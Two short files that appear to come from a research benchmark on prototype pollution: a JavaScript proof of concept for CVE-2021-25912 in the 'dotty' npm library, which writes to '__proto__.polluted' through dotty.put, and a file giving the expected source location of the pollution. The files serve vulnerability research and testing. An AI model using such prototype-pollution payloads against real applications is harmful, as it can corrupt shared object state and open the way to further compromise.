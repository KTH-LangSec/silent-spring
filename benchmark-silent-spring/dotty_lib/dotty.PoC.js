//https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25912
  const dotty = require("dotty");
  dotty.put({}, "__proto__.polluted", "yes");
