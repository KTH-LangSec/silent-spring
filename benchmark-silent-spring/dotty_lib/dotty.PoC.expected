node_modules/dotty/lib/index.js:147:17